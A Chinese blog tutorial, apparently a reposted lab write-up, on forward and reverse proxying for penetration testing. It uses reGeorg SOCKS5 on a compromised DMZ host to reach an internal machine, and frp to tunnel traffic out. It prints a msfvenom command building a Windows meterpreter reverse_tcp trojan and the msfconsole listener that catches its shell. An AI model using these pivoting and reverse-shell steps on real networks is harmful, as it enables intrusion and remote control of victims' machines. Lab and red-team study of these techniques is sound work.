当前位置:   article > 正文

流量代理-正向反向代理_frp正向代理

frp正向代理

正向代理

正向代理有三个角色

配置正向代理意义

        攻击者拿下一台失陷主机发现这台失陷主机有两块网卡,下一步上传自己的内网扫描工具,比如fscan,或者自己写的一些主机存活检测脚本

        扫描之后发现另一台内网主机20.1.1.2,这台主机开启了一些445的危险端口,可以尝试永恒之蓝等漏洞的时候,但是攻击主机无法直接联通这台内网主机,我们就没办发使用msf工具进行攻击,总不能上传一个msf工具到这台失陷主机吧?那也太蠢了,此时就需要在失陷主机上配置进行正向代理(socks5),配置好以后就可以直接在攻击机访问内网主机

socks5介绍

        socks5提供代理服务,各种编程语言自带socks5服务,只需要编辑几行代码就可以搭建起socks5服务,直接上传编辑好的脚本就可以开启服务

大致思路

        首先上传socks5脚本到失陷主机,作为scoks5的服务端,攻击机开启socks5的客户端,当攻击机10.1.1.1想访问内网主机20.1.1.2的时候,通过socks5代理转发到内网主机20.1.1.2

        其实就和我们常用的工具BurpSuite一样,只不过BurpSuite在我们本地,没有放在失陷主机上

实际意义

        在我们做渗透测试或者红蓝对抗的时候,有些公司的一些资产会放到内网里面,我们不能直接访问到,此时就需要配置socks5

搭建环境

DMZ失陷主机两块网卡,一块nat模式。一块仅主机模式

内网主机一块仅主机模式网卡

失陷主机ip

内网主机ip

失陷主机可以访问内网主机

攻击机不能访问内网主机

攻击机可以访问失陷主机

DMZ失陷主机搭建socks5代理

脚本放到失陷主机根目录下

 攻击机访问失陷主机的该文件,出现改样式,访问成功

 输入

python reGeorgSocksProxy.py -p 8080 -u http://10.4.7.130/tunnel.nosocket.php
服务端搭建成功攻击机客户端搭建

小狐狸插件中设置

开启代理访问10.1.1.2

软件配置正向代理

以上是通过github的脚本配置正向代理

 还可以使用Proxifier来进行配置

先配置服务器选项

 输入本地127.0.0.1:8080

新建规则 

远程桌面连接尝试

成功

有很多时候会连接不上,可能是python脚本或者虚拟机环境版本不够稳定

反向代理

        反向代理是失陷主机无法直接联通攻击主机,可以借助另一台可以直接访问攻击机的失陷主机来联通

        在拿到内网权限横向移动之后拿到一台主机,此台主机无法直接联通我的处于内网的攻击机,此时使用反向代理进行连接

用nat模式模拟内网,用桥接模拟公网ip

环境:

一台桥接的dmz主机                       172.20.10.2

一台nat的kali主机                        10.4.7.138

真实机作为kali主机的服务器        172.20.10.13

配置文件解析

kali开启frp客户端,真实机开启frp服务端 

服务端配置文件不用更改,客户端配置文件修改为真实机启动frps

kali启动frpc 

生成木马 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.13 LPORT=6789 -f exe -o test.exe

此前配置文件将反向代理流量抓发到6789端口,我们使用msf工具开启监听 

  1. msfconsole
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST 127.0.0.1
  4. set LPORT 6789
  5. run

将生成的木马放到dmz主机,点击,查看kali连接成功

反向代理成功 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/爱喝兽奶帝天荒/article/detail/996521
推荐阅读
相关标签
  

闽ICP备14008679号